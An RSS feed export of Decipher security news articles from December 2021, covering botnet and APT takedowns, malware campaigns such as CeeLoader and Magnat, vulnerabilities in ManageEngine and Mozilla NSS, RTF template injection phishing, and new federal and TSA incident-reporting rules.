<![CDATA[Decipher]]> https://decipher.sc Decipher is an independent editorial site that takes a practical approach to covering information security. Through news analysis and in-depth features, Decipher explores the impact of the latest risks and provides informative and educational material for readers curious about how security affects our world. Tue, 07 Dec 2021 00:00:00 -0500 en-us info@decipher.sc (Amy Vazquez) Copyright 2021 3600 <![CDATA[Google Disrupts Massive Glupteba Botnet]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/google-disrupts-massive-glupteba-botnet https://duo.com/decipher/google-disrupts-massive-glupteba-botnet Tue, 07 Dec 2021 00:00:00 -0500

After tracking the activities of the Glupteba botnet for several years, Google has made two moves to disrupt the botnet’s operations, including filing a lawsuit against the alleged operators, taking down servers used by the botnet, and disabling more than 100 Google accounts associated with it.

The Glupteba botnet has included more than a million infected machines and it is part of a larger cybercrime enterprise that involves credential theft, credit card fraud, cryptomining, and other malicious activities. Google researchers have been following the botnet’s rise, and a few months ago discovered some information in Glupteba binaries that led to a deeper investigation and the takedown effort and lawsuit.

“While analyzing Glupteba binaries, our team identified a few containing a git repository URL: “git.voltronwork.com”. This finding sparked an investigation that led us to identify, with high confidence, multiple online services offered by the individuals operating the Glupteba botnet. These services include selling access to virtual machines loaded with stolen credentials (dont[.]farm), proxy access (awmproxy), and selling credit card numbers (extracard) to be used for other malicious activities such as serving malicious ads and payment fraud on Google Ads,” Shane Huntley and Luca Nagy of the Google Threat Analysis Group said.

The lawsuit alleges that two Russian men, Dmitry Starovikov and Alexander Filippov, operated the botnet, with help from other unnamed defendants. Google alleges that the operators’ schemes infringed on the company’s trademarks, and violated the Computer Fraud and Abuse Act, the Racketeering Influenced and Corrupt Organizations Act and other U.S. statutes.

The Glupteba botnet has some unique characteristics that have made it particularly resilient and difficult to disrupt. The main difference between Glupteba and other bot networks is that Glupteba has backup command-and-control mechanisms located on the Bitcoin blockchain that are designed to serve as failsafes if the main C2 servers are offline.

“Unfortunately, Glupteba’s use of blockchain technology as a resiliency mechanism is notable here and is becoming a more common practice among cyber crime organizations."

“Unlike conventional botnets, the Glupteba botnet does not rely solely on predetermined domains to ensure its survival. Instead, when the botnet’s C2 server is interrupted, Glupteba malware is hard-coded to ‘search’ the public Bitcoin blockchain for transactions involving three specific Bitcoin addresses that are controlled by the Glupteba Enterprise,” the lawsuit says.

“From time to time, the Glupteba Enterprise executes transactions in those addresses, and as part of those transactions, the Glupteba Enterprise leaves in the blockchain the location of the domain for a back- up C2 Server.”

One of the key money making avenues for the Glupteba operators is the sale of access to Google accounts. After infecting a new machine–usually through a fake download link for an app–the malware will steal the victim’s Google account credentials and send them back to the C2 servers. Rather than selling those stolen credentials directly to other criminals, the Glupteba operators set up a virtual machine, load the credentials for a given account into a browser on that VM, and then sell access to the account through a site called Dont.farm.

“Dont.farm’s customers pay the Glupteba Enterprise in exchange for the ability to access a browser that is already logged into a victim’s stolen Google account. Once granted access to the account, the Dont.farm customer has free rein to use that account however they desire, including buying advertisements and launching fraudulent ad campaigns, all without the true account owner’s knowledge or authorization,” the lawsuit says.

The Glupteba operators also allegedly ran credit card fraud schemes and ad fraud operations using Google AdWords, as well as malicious cryptomining operations, taking advantage of the processing power of infected machines.

“Unfortunately, Glupteba’s use of blockchain technology as a resiliency mechanism is notable here and is becoming a more common practice among cyber crime organizations. The decentralized nature of blockchain allows the botnet to recover more quickly from disruptions, making them that much harder to shutdown. We are working closely with industry and government as we combat this type of behavior, so that even if Glupteba returns, the internet will be better protected against it,” said Royal Hansen, vice president of security, and Halimah DeLaine Prado, general counsel at Google.

We don’t just plug security holes, we work to eliminate entire classes of threats for consumers and businesses whose work depends on the Internet.

<![CDATA[Microsoft Seizes Sites From Chinese APT Group]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/microsoft-seizes-sites-from-chinese-apt-group https://duo.com/decipher/microsoft-seizes-sites-from-chinese-apt-group Tue, 07 Dec 2021 00:00:00 -0500

Microsoft has cracked down on a China-based hacking group that's behind widespread cyberattacks on government agencies, think tanks and human rights organizations in 29 countries, including the U.S.

The tech company said on Monday it seized 42 websites that were used by the threat group, which is called Nickel, with the aim of cutting off attackers’ access to victims and preventing them from using the sites to execute attacks.

“Our disruption will not prevent Nickel from continuing other hacking activities, but we do believe we have removed a key piece of the infrastructure the group has been relying on for this latest wave of attacks,” said Tom Burt, corporate vice president of Customer Security and Trust with Microsoft on Monday.

The Nickel threat group (also known as APT15, Vixen Panda, KE3CHANG, Royal APT and Playful Dragon) has launched highly sophisticated attacks since at least 2010, infecting victims with malware that steals data, facilitates intrusion and conducts surveillance.

Typically, attackers initially infected victims through compromised credentials obtained with spear-phishing; via compromised, third-party virtual private network (VPN) suppliers; or by exploiting known vulnerabilities on unpatched Exchange Server or SharePoint systems. The APT has leveraged several malware families, including the Okrum backdoor, MirageRAT and the Ketrican malware.

Nickel's targets have ranged broadly from diplomatic organizations and ministries of affairs to members of organizations that attempt to maintain world peace. Researchers have observed a frequent correlation between the threat group’s targets and China’s geopolitical interests.

Microsoft on Dec. 2 filed pleadings with the U.S. District Court for the Eastern District of Virginia to take control of the attacker owned sites, arguing in a complaint that the APT’s activities “continue to cause irreparable injury to Microsoft, its customers, and the public” and that the attacks have caused a $5,000 loss to Microsoft during a one-year period. The complaint was filed in this specific state because that’s where the domains maintained by the actor were registered and where some of the victims were targeted, according to Microsoft.

These types of seizures both help Microsoft obtain control of the malicious websites, and also redirect traffic from the sites to Microsoft servers, giving the company better insight into the activities of the APT.

“This is definitely a significant disruption,” said Jake Williams, co-founder and CTO at incident response company BreachQuest. “While the domains can be replaced relatively quickly, multiple tool signatures were released and those will require more effort to replace. Organizations with appropriate telemetry, such as DNS or web proxy logs, can look back historically to determine if they've been targeted as well. As disruption operations go, taking over command and control domains is a worst case scenario.”

Microsoft - and other tech companies, such as Google - have previously relied on this type of legal strategy to disrupt cybercriminal operations. To date, Microsoft has filed 24 similar types of lawsuits that have allowed them to take down 10,000 malicious cybercriminal websites and 600 nation-state actor websites, including infrastructure used by Trickbot, Zeus, Citadel and the Necurs botnet. Google has also disrupted various campaigns and infrastructure associated with cybercriminals, on Tuesday announcing it had disrupted the Glupteba Windows malware.

<![CDATA[Cloud Service Provider Compromises Use CeeLoader Malware]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/solarwinds-attacker-targets-cloud-providers-with-ceeloader-malware https://duo.com/decipher/solarwinds-attacker-targets-cloud-providers-with-ceeloader-malware Mon, 06 Dec 2021 00:00:00 -0500

A series of campaigns, with links to the threat actor behind the SolarWinds supply-chain intrusion, have been targeting cloud service providers with a new malware loader variant called CeeLoader.

Researchers with Mandiant in a Monday analysis said they identified two distinct clusters of activity, UNC3004 and UNC2652, which they associate with UNC2452 (also known as Nobelium or APT29), the group behind the SolarWinds supply-chain hack. However, while researchers said it was “plausible” that these are the same group, they said they don't have enough evidence to make this determination with high confidence. The activity clusters utilized a variety of tactics and tools, including CeeLoader, in attacks that aimed to steal data "relevant to Russian interests" from businesses and government entities globally.

"The threat actors continue to innovate and identify new techniques and tradecraft to maintain persistent access to victim environments, hinder detection, and confuse attribution efforts," said Luke Jenkins, Sarah Hawley, Parnian Najafi and Doug Bienstock, researchers with Mandiant.

CeeLoader, which is written in the C programming language and supports shellcode payloads that are executed in memory, was observed being installed by the Cobalt Strike Beacon malware as a Scheduled Task, which once downloaded ran on login as SYSTEM on victims' specific systems. The loader, which was first identified in the third quarter of 2021, is a variant of a malware family tracked by Microsoft as VaporRage.

While the two share some similarities in their functionalities, which are to obtain second-stage encrypted payloads, CeeLoader contains a number of changes that make analysis more difficult, said Jenkins. The loader's code is obfuscated between large blocks of junk code with meaningless calls to the Windows API.

CeeLoader uses AES-256 to encrypt payloads, whereas VaporRage uses a basic XOR algorithm," said Jenkins. "Both payloads execute shellcode that is loaded directly into memory and in both cases, the malware has been seen to load Beacon. Both samples also appear to be executed by rundll32, a windows binary for loading DLLs from disk. Additionally, in both samples, a specific export is usually called to execute the sample, this is usually a technique by the threat actor to bypass automated sandboxes.

CeeLoader was uncovered in attacks targeting Microsoft Azure Active Directory accounts for various cloud services providers. Microsoft in October warned that UNC2452 was targeting these types of solution providers and resellers, which assist end users in deploying, customizing and managing cloud services and other technologies. The compromise of these types of companies would allow attackers to move laterally across impacted cloud environments in order to then gain access to downstream government and think tank customers, enabling further attacks, said Microsoft.

The methods of initial access varied between attacks. In one attack, the threat actor compromised a local VPN account to perform reconnaissance and gain access to the cloud service provider's (CSP) environment. In another campaign, threat actors gained access to the organizations’ Microsoft 365 account with a stolen session token.

“Mandiant analyzed the workstations belonging to the end user and discovered that some systems had been infected with Cryptbot, an info-stealer malware, shortly before the stolen session token was generated,” said researchers. "Mandiant observed that in some cases the user downloaded the malware after browsing to low reputation websites offering free, or cracked, software."

Post-Compromise Activities

Once they had accessed the victim environments, the threat group compromised accounts with Azure AD roles, specifically targeting a feature called Admin of Behalf of (AOBO). This feature gives specific CSP tenant users access to Azure subscriptions in the customer’s tenants - meaning they have complete control over all resources within the Azure subscription. Once the threat actor obtained these privileges they executed commands with NT AUTHORITY\SYSTEM privileges within Azure VMs, utilizing the Azure Run Command feature. This feature allows users to run PowerShell scripts within an Azure VM without the need for Windows credentials that are valid on the VM itself, said researchers.

From there, the threat actor used RDP to pivot between systems, performed reconnaissance, distributed the Beacon malware around the network (ultimately used to install CeeLoader), ran native Windows commands for credential harvesting and attempted to dump the Active Directory database (ntds.dit) using the built-in ntdsutil.exe command.

Researchers also observed attackers leveraging various tactics to make the intrusion more difficult to defend against. In one incident, they used different compromised accounts for separate malicious functions, such as lateral movement, reconnaissance, and more. Researchers believe that this technique was used to decrease the likelihood that detecting one activity could expose the entire scope of the intrusion.

“Mandiant found evidence that the actor compromised multiple accounts and used one for the sole purpose of reconnaissance, while the others were reserved for lateral movement within the organization,” said researchers. “Mandiant previously observed this threat actor using strict operational security to use specific accounts and systems in victim environments for activities that are often higher risk, such as data theft and large-scale reconnaissance.”

As part of the threat actor’s infrastructure, researchers also found the actor hosting second-stage payloads as encrypted blobs on compromised, legitimate websites running WordPress. Attackers also utilized residential IP proxy services and geo located infrastructure when communicating with compromised victims, which researchers said "can make it very difficult for investigators to differentiate between normal user activity and the threat actor's activity.”

“These tactics showcase the complexity of the attacker's operations and is rarely seen executed by other threat actors,” said researchers.

UNC2452, which has previously been associated with several malware families, including Sunburst, Teardrop, and the FoggyWeb backdoor, continues to infect companies worldwide. On Monday, CERT-France released details on a number of spear-phishing campaigns by the threat actor directed against French entities since February 2021. Mandiant researchers said the intrusion activity demonstrates a “well-resourced threat actor set operating with a high level of concern for operational security.” The group’s abuse of the third-parties (in this case, CSPs) also gives it access to a wider scope of victims in individual attacks, said researchers.

“Though Mandiant cannot currently attribute this activity with higher confidence, the operational security associated with this intrusion and exploitation of a third party is consistent with the tactics employed by the actors behind the SolarWinds compromise and highlights the effectiveness of leveraging third parties and trusted vendor relationships to carry out nefarious operations,” said researchers.

<![CDATA[New Guidance Pushes Federal Agencies Toward Automated Incident Reporting]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/new-guidance-pushes-federal-agencies-toward-automated-incident-reporting https://duo.com/decipher/new-guidance-pushes-federal-agencies-toward-automated-incident-reporting Mon, 06 Dec 2021 00:00:00 -0500

The White House is changing the way that it requires federal agencies to report security incidents in an effort to automate the process and make incident reporting simpler and more efficient.

Under new guidance issued by the Office of Management and Budget Monday, the Cybersecurity and Infrastructure Security Agency (CISA) will be required to develop a strategy to increase the usage of automated reporting mechanisms, specifically those that use machine-readable data, by the spring of next year. By the end of 2022, CISA will have to give OMB real-time access to incident data. The requirement is included in a broader memorandum issued by OMB that is part of an initiative to modernize and mature the federal security infrastructure and policies.

Currently, nearly half of security incidents at federal civilian agencies are reported manually through the US-CERT website, which requires significant work on the part of analysts. Automated reporting systems are more efficient and allow for quicker response and notification to other agencies that may be affected by the same incident.

“To ensure accurate reporting of information, agencies have historically needed to painstakingly and manually compare their incidents with US-CERT’s account. By late spring of 2022, CISA, in coordination with OMB, will develop a strategy, including any technical standards, to modernize and improve the use of machine-readable incident data and indicators in a manner that communicates directly with agency SOCs and/or incident reporting systems. CISA will provide OMB real-time access to incident information no later than December 2022,” the memorandum says.

“FISMA data collection has long remained an overly manual process that often leads agencies to create complicated spreadsheets and internal processes to respond to questions. As the Federal information security apparatus matures, so should its reporting mechanisms. OMB is emphasizing automation and the use of machine-readable data to speed up reporting, reduce agency burden, and improve outcomes.”

The new guidance is designed to help accelerate the process of modernizing the processes and systems that federal agencies use. In May, President Joe Biden issued an Executive Order that requires federal agencies to make a number of improvements to their cybersecurity infrastructure, including moving to a zero trust architecture. The OMB memorandum is meant as a companion to the EO and much of the focus is on automation and providing better metrics to measure the effectiveness of security controls and programs. One of the new requirements is that CISA work with OMB and the National Institute of Standards and Technology to improve the standards for using machine-readable data as part of the Continuous Diagnosis and Mitigation (CDM) program.

“By April 2022, CISA, in coordination with OMB and NIST, will develop a strategy to continue to evolve machine-readable data standards for cybersecurity performance and compliance data through CDM (or a successor process). This strategy will include a set of metrics (supplementing the existing CIO metrics) based on NIST Standards (e.g., NIST SP 800-53) for controls that can be reported in an automated manner, and will set forth a timeline for when these metrics will be collected automatically,” the guidance says.

<![CDATA[Decipher Podcast: Source Code 12/3]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/decipher-podcast-source-code-12-3 https://duo.com/decipher/decipher-podcast-source-code-12-3 Fri, 03 Dec 2021 08:00:00 -0500

<![CDATA[APT Groups Exploiting Critical Flaw in ManageEngine ServiceDesk Plus]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/apt-groups-exploiting-critical-flaw-in-manageengine-servicedesk-plus https://duo.com/decipher/apt-groups-exploiting-critical-flaw-in-manageengine-servicedesk-plus Fri, 03 Dec 2021 00:00:00 -0500

APT groups are targeting a months-old remote code execution vulnerability in Zoho’s ManageEngine ServiceDesk Plus help desk software in order to upload malicious files, drop webshells, and use the compromised servers as footholds to move laterally on target networks.

The vulnerability (CVE-2021-44077) is in versions of ManageEngine ServiceDesk Plus before version 11306 and it allows an attacker to bypass the authentication mechanism for the application and upload whatever files they choose. Zoho released an updated version that addressed the vulnerability in September, and published an updated advisory on Nov. 22 warning customers that active exploits against the flaw were underway. On Thursday, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) warned that their specialists have seen APT actors exploiting the vulnerability.

“The FBI and CISA assess that advanced persistent threat (APT) cyber actors are among those exploiting the vulnerability. Successful exploitation of the vulnerability allows an attacker to upload executable files and place webshells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files,” the advisory says.

The ManageEngine ServiceDesk Plus application is an IT help desk and asset management tool used in enterprises across a wide range of industries. The vulnerability only affects on-premises deployments, and not the cloud version of the application.

In the advisory, CISA and FBI said they have observed APT groups using a number of different tactics and techniques after exploiting the ManageEngine ServiceDesk Plus vulnerability, including writing webshells to disk in order to maintain persistence, and adding and deleting new accounts. Attackers also are stealing opies of the Windows Active Directory databases and registry hives. The attackers are spending some time cleaning up after themselves after compromising a server, too.

“Confirming a successful compromise of ManageEngine ServiceDesk Plus may be difficult—the attackers are known to run clean-up scripts designed to remove traces of the initial point of compromise and hide any relationship between exploitation of the vulnerability and the webshell,” the advisory says.

Enterprises that run ManageEngine ServiceDesk Plus should upgrade to version 11306 as soon as possible.

<![CDATA[TSA Issues Security Rules For Rail Operators]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/tsa-issues-security-rules-for-rail-operators https://duo.com/decipher/tsa-issues-security-rules-for-rail-operators Fri, 03 Dec 2021 00:00:00 -0500

New cybersecurity requirements from the Transportation Security Administration (TSA) give freight railroads, passenger rail and rail transit operators a 24-hour deadline for reporting security incidents.

Starting on Dec. 31, “high-risk” operators and owners across the rail sector must take a number of steps to bolster the cybersecurity of their systems. They must designate a cybersecurity coordinator, implement security incident response plans with the intent of reducing the risk of operational disruption, complete a vulnerability assessment to identify potential security holes in their systems and report cybersecurity incidents to the Cybersecurity and Infrastructure Security Agency (CISA) within 24 hours.

The incidents that must be reported include unauthorized access of IT or operational technology systems, discovery of malicious software or denial-of-service attacks on these systems, and “any other cybersecurity incident that results in operational disruption.”

“These new cybersecurity requirements and recommendations will help keep the traveling public safe and protect our critical infrastructure from evolving threats,” said Secretary of Homeland Security Alejandro Mayorkas in a statement. “DHS will continue working with our partners across every level of government and in the private sector to increase the resilience of our critical infrastructure nationwide.”

In addition, the TSA has released voluntary guidance recommending that smaller and “lower-risk” rail operators implement the same measures. Airline and airport operators will also be required to appoint a cybersecurity coordinator and report breaches within 24 hours.

Cyberattacks in the Transportation Sector

The upcoming mandates, first detailed in October, are part of a series of sprints that were announced by Mayorkas earlier this year. These sprints, which came on the heels of the Colonial Pipeline cyberattack and the ensuing executive order for securing critical infrastructure from the Biden administration, include initiatives from the DHS around ransomware, industrial control systems and more. Mayorkas in March said that the “Cybersecurity and Transportation” sprint would focus on increasing the security of transportation systems, including aviation, rail, pipelines, and the marine transport system.

The sprint also comes on the heels of a slew of cyberattacks targeting various transportation agencies over the years, including the New York Metropolitan Transportation Authority, the Santa Clara Valley Transportation Authority, the Ann Arbor Area Transportation Authority and the Toronto Transit Commission. An IBM X-Force industry profile found that the transportation industry was the ninth most attacked sector in 2020, experiencing 5.1 percent of all attacks in the top ten industries; and the industry was also ranked the tenth most costly sector for experiencing a data breach.

Cybercriminals behind these attacks, which have included sophisticated actors like Chinese nation-state actor APT10 or Iran-linked ITG07, are attempting to steal data that can be monetized or launch ransomware attacks, with researchers pointing to recent claims on underground forums by attackers that they have access to networks for companies operating air, ground and maritime cargo transport.

Cyberattacks on the transportation sector have had varying impacts. The cyberattack on the Ann Arbor Area Transportation Authority, for instance, caused temporary disruptions to real-time bus information and other information systems, but bus service continued to operate. A ransomware attack on the Santa Clara Valley Transportation Authority, meanwhile, reportedly resulted in a days-long shutdown of many computer systems across the agency, and, while light rails remained operational, certain functions like real-time arrival data went down.

New Rail Mandates

During a Thursday House Committee hearing, government representatives stressed that transportation organizations continue to struggle with highly complex - and in some cases, archaic - systems, across traffic management, control and signaling, station operation and more. At the same time, these organizations must juggle securing operating systems, applications and mobile devices on various networks, as well as various supply-chain issues.

“I think the bottom line is we’re constantly operating behind the eight-ball,” said Nick Marinos, director of the U.S. Government Accountability Office’s (GAO) Information Technology and Cybersecurity team, during the hearing.

An October audit found that the Department of Transportation (DOT) has “yet to address longstanding cybersecurity deficiencies related to its practices for protecting its mission-critical systems from unauthorized access, alteration, or destruction.”

The audit found that the DOT did not maintain complete inventories of all its systems, a practice essential to risk management; it also did not test the security controls for systems and did not consistently remediate flaws.

“The reality is that it just takes one successful cyberattack to take down an organization and each federal agency, as well as owners and operators of critical infrastructure have to protect themselves against countless numbers of attacks,” said Marinos. “And so in order to do that, we need our federal government to be operating in the most strategic way possible.”

Rail Industry Response

Since announcing the directives in October, the TSA (which is part of the DHS) has sought input from industry stakeholders and federal partners, including CISA. The directives were initially met with pushback from a group of Republican senators, as well as those within the rail industry, such as Thomas Farmer, assistant vice president of security with the Association of American Railroads (AAR).

In a November Committee of Transportation and Infrastructure hearing, Farmer argued that the directives would lead to “erroneous perceptions” that the rail sector did not have effective security measures and that the directives posed several implementation challenges. The AAR also said that security assessments have been conducted on a recurring basis, and that railroads have already been reporting "significant cyber threats, incidents and security concerns" to the DOT since 2014.

“Railroads and rail industry organizations have not been advised by federal officials of any prevailing emergency conditions that justify use of this authority, despite the many opportunities available,” said Farmer during the hearing.

In a Thursday statement, the AAR said the rail industry has had “productive consultations” with agency officials and that a “number of the industry’s most significant concerns have been addressed."

“For the better part of two decades, railroads have thoughtfully coordinated with each other and government officials to enhance information security, which has proven to be an effective, responsive way of addressing evolving threats,” said AAR President and CEO Ian Jefferies in the statement.

<![CDATA[Malicious Chrome Extension, Backdoor Uncovered in Malware Campaign]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/malicious-chrome-extension-backdoor-uncovered-in-malware-campaign https://duo.com/decipher/malicious-chrome-extension-backdoor-uncovered-in-malware-campaign Thu, 02 Dec 2021 00:00:00 -0500

Researchers have detailed a threat actor, which they call Magnat, deploying a new backdoor and undocumented malicious Google Chrome extension in malware attacks that date back to 2018.

Magnat - a name that stems from the username in the build path of the campaign’s malware - has been using fake software installers as a lure to convince users to execute malware on their system, with filenames that include viber-25164.exe and wechat-35355.exe. Researchers with Cisco Talos, on Thursday, said they believe that the threat actor is stealing credentials with the intent of selling them on underground forums.

Since this threat delivers multiple different payloads, including information stealers, it can pose a significant threat to enterprises," said Tiago Pereira, technical lead of security research with Cisco Talos. "We have seen the credentials stolen by these stealers act as an initial infection point for larger attacks, including ransomware incidents.

Researchers assessed that the campaign uses malvertising - the use of malicious advertisements, which typically occurs through injecting malicious code into ads - as an initial means to reach users who might be interested in downloading popular software. Most victims targeted have been in Canada, the U.S. and Australia, with about 50 percent of infections in Canada.

“This type of threat can be very effective and requires that several layers of security controls are in place, such as, endpoint protection, network filtering and security awareness sessions,” Pereira said.

Backdoor and Malicious Chrome Extension

Once run, the fake installers execute a loader (typically either an .exe or .iso file) that pretends to be a software installer. In reality, the loader creates several files and deploys various commands that lead to the execution of three malware components. One of these is a malicious Google Chrome extension, which researchers called “MagnatExtension.”

The browser extension, which includes samples dating back to August 2018, is delivered via an executable (not from the Chrome Extension store) with the sole function of preparing the system and installing the extension. Once it has been installed, the extension shows up for victims as “Google’s Safe Browsing” and purports to be technology that examines URLs to look for unsafe websites. The extension code, which is obfuscated using function redirects, encrypted substitution arrays, function wrappers and string encoding, has several web browser information-stealing capabilities.

These include a keylogger that captures the keys typed by victims and a form grabber that retrieves credentials from web data forms. The extension also grabs screenshots of passwords and swipes browser cookies.

The campaign also utilizes a backdoor that researchers called “MagnatBackdoor.” This is an AutoIT-based installer that configures the targeted system for stealthy Microsoft Remote Desktop (RDP) access, adds a new user and sets a scheduled task to periodically ping the command-and-control (C2) server.

“As a result of this installer's actions there is a way for the attacker to access the system remotely via RDP, which is why we call it a backdoor,” said researchers.

The backdoor also creates an outbound SSH tunnel to a remote server, which allows attackers to forward the local RDP port to be used for remote access. Researchers said that the motives for the deployment of the RDP backdoor is unclear. However, “the most likely are the sale of RDP access, the use of RDP to work around online service security features based on IP address or other endpoint installed tools or the use of RDP for further exploitation on systems that appear interesting to the attacker,” said Pereira.

Continual Development

Researchers observed widely-known and documented commodity password stealers being deployed as part of the attack to collect system credentials.

The types of password stealers have varied over time, suggesting constant development by the attackers. Between 2018 to late 2019, the Azorult password stealer was initially deployed. However, the use of Azorult suddenly stopped in 2020, which researchers believe may have been a consequence of Chrome 80 cracking down on Azorult’s password stealing abilities. More recent attacks leveraged the Vidar Stealer, Gozi and the Redline Stealer, suggesting that attackers have been testing replacements for Azorult.

Researchers warn that attackers will continue to develop and improve this campaign with the purpose of stealing and selling credentials. The discovered malware families "have been subject to constant development and improvement by their authors - this is likely not the last we hear of them," said Pereira.

<![CDATA[Mozilla Fixes Critical Flaw in NSS Crypto Library]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/mozilla-fixes-critical-flaw-in-nss-crypto-library https://duo.com/decipher/mozilla-fixes-critical-flaw-in-nss-crypto-library Thu, 02 Dec 2021 00:00:00 -0500

Mozilla has released a fix for a critical memory corruption flaw in its NSS cryptographic library that could have allowed an attacker to execute arbitrary code on vulnerable applications simply by supplying an overly large digital signature to the app.

Network Security Services (NSS) is an open-source library developed by Mozilla that is used for a variety of functions across a wide range of applications. Although it is not used in Firefox, it is used in Thunderbird, LibreOffice and many other applications. Researcher Tavis Ormandy of Google’s Project Zero discovered the vulnerability (CVE-2021-43527) with a custom fuzzer he wrote and reported the flaw to Mozilla, which released a fix for the bug in NSS 3.73 this week.

When a user supplies a digital signature encoded with ASN.1 to an application using NSS for verification, NSS creates a structure to store the signature. This is where the problem lies.

“The maximum size signature that this structure can handle is whatever the largest union member is, in this case that’s RSA at 2048 bytes. That’s 16384 bits, large enough to accommodate signatures from even the most ridiculously oversized keys,” Prmandy said in a post explaining the flaw.

“Okay, but what happens if you just....make a signature that’s bigger than that? Well, it turns out the answer is memory corruption. Yes, really. The untrusted signature is simply copied into this fixed-sized buffer, overwriting adjacent members with arbitrary attacker-controlled data.”

Although the vulnerability itself is a common buffer overflow and the exploitable code has been in NSS since 2012, none of internal testing and fuzzing that Mozilla does on a continuous basis, or the external fuzzing done through the oss-fuzz program caught it. Ormandy said this was not the result of poor tooling or processes, but rather the combination of a number of separate factors stemming from the ways in which NSS was fuzzed and tested. One issue is that because NSS is a modular library, each component is tested and fuzzed individually, and another is that fuzzers testing NSS had a limit of 10000 bytes of input.

“There is no such limit within NSS; many structures can exceed this size. This vulnerability demonstrates that errors happen at extremes, so this limit should be chosen thoughtfully,” Ormandy said.

“This issue demonstrates that even extremely well-maintained C/C++ can have fatal, trivial mistakes.”

<![CDATA[APTs Leverage New RTF Phishing Tactic]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/apts-leverage-new-rtf-spear-phishing-tactic https://duo.com/decipher/apts-leverage-new-rtf-spear-phishing-tactic Wed, 01 Dec 2021 08:00:00 -0500

Researchers are warning of a new phishing attack technique, where attackers leverage a legitimate template functionality in the Rich Text Format (RTF) file format in order to retrieve malicious payloads from a remote URL.

The attack was observed as early as January, but since then researchers with Proofpoint have observed advanced persistent threat (APT) actors increasingly adopting the phishing tactic in the second and third quarter of 2021. Researchers warn that the simplicity of the attack, which they call RTF template injection, sets it up for further widespread use by less sophisticated cybercriminals.

“RTF template injection is poised for wider adoption in the threat landscape including among cybercriminals based on its ease of use and relative effectiveness when compared with other phishing attachment template injection-based techniques,” said researchers with Proofpoint on Wednesday.

The attack stems from the document formatting control word for the “*\template” structure, which is part of RTF's plain text document formatting properties. The first part of this structure's value designates a destination, and the second part designates the specific control word function; Together, these values signify the destination of legitimate template files to be retrieved. However, it is trivial for attackers to alter the bytes of an existing RTF file and insert a template control word destination that includes a URL resource (instead of an accessible file resource destination). In a real-life attack that would allow a remote payload to be fetched when victims open either .rtf files or .doc.rtf files (RTF files that are opened using Microsoft Word).

This tactic is different from how malicious RTF objects have historically been utilized by cybercriminals. Many of these common attacks include overlay data, or additional data appended to the end of RTF files, in order to embed decoy files that execute attacker-controlled code. For instance, in June, an APT was found sending victims phishing emails that contained RTF files embedded with the RoyalRoad weaponizer.

“While historically the use of embedded malicious RTF objects has been well documented as a method for delivering malware files using RTFs, this new technique is more simplistic and, in some ways, a more effective method for remote payload delivery than previously documented techniques,” said researchers.

"RTF template injection is poised for wider adoption in the threat landscape including among cybercriminals based on its ease of use and relative effectiveness when compared with other phishing attachment template injection-based techniques."

This year, researchers observed three APT actors utilizing RTF template injection. The DoNot Team APT group, which has been suspected of being aligned with Indian state interests, was observed leveraging the technique between February and July. The APT’s emails used “defense proposal” lures and appeared to target entities in Pakistan and Sri Lanka. In this attack, the threat group included the template formatting property within a preexisting list override table in the RTF file, which governs the formatting of various document features (such as headers or footers). Specifically, the malicious template control word is embedded in the “wgrffmtfilters” font family control word, said researchers. The APT also utilized a Unicode signed character notation in order to obfuscate the URL value of the RTF file, which researchers believe is a way to evade static detection signatures in antivirus software.

“The ability of RTF files to parse these signed 16-bit Unicode characters provides actors an alternative to using plaintext strings containing a URL, which allows for easy analysis of malicious samples upon detection,” said researchers.

Between April and September, researchers observed TA423, a China-related APT actor, send phishing emails that targeted the Malaysian deep water energy exploration sector and contained RTF files as attachments. These RTF files included remote template injection URLs in plaintext, which referenced external content in plain sight in the strings of the attachments.

“Of note is that this threat actor also weaponized the RTF files by using a different section of the document formatting properties than was previously observed among the DoNot Team campaigns,” said researchers. “This actor chose to modify a preexisting enclosing group with a font family control word rather than the wgrffmtfilters group previously discussed.”

Most recently, on Oct. 5 the Gamaredon APT actor was observed leveraging the tactic in emails that utilized Ukrainian governmental file lures. The APT, linked to the Russian government, utilized RTF template injection documents that communicated with an external domain. In this attack, Microsoft Office documents used the remote template infection tactic to retrieve the malicious payloads, and in some cases used an MP3 file as a delivery resource. Gamaredon also used this tactic alongside several other attachment delivery methods - including Office and XML template documents - that all shared a single URL, leading researchers to believe the APT is experimenting with new file types.

Researchers said that this new phishing method is an expanding threat surface for organizations globally, and they expect it to be utilized by less sophisticated threat actors in addition to APTs.

“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector,” said researchers.

<![CDATA[SIM Hijacking Attack Lands Hacking Group Member in Jail]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/hacking-group-member-jailed-for-sim-hijacking-attack https://duo.com/decipher/hacking-group-member-jailed-for-sim-hijacking-attack Wed, 01 Dec 2021 00:00:00 -0500

A member of an international hacking group known as The Community has been sentenced to 10 months in prison in connection with a multi-million dollar SIM hijacking attack.

Garrett Endicott, 22, of Warrensburg, Missouri, was first indicted in 2019, and is the sixth and final member of The Community to be sentenced, according to the Department of Justice on Tuesday. The group launched SIM hijacking (also known as SIM swapping) attacks in order to steal cryptocurrency from victims across the country, including ones in California, Texas and New York.

“The actions of these defendants resulted in the loss of millions of dollars to the victims, some of whom lost their entire retirement savings,” said Acting U.S. Attorney Saima Mohsin in a statement. “This case should serve as a reminder to all of us to protect our personal and financial information from those who seek to steal it.”

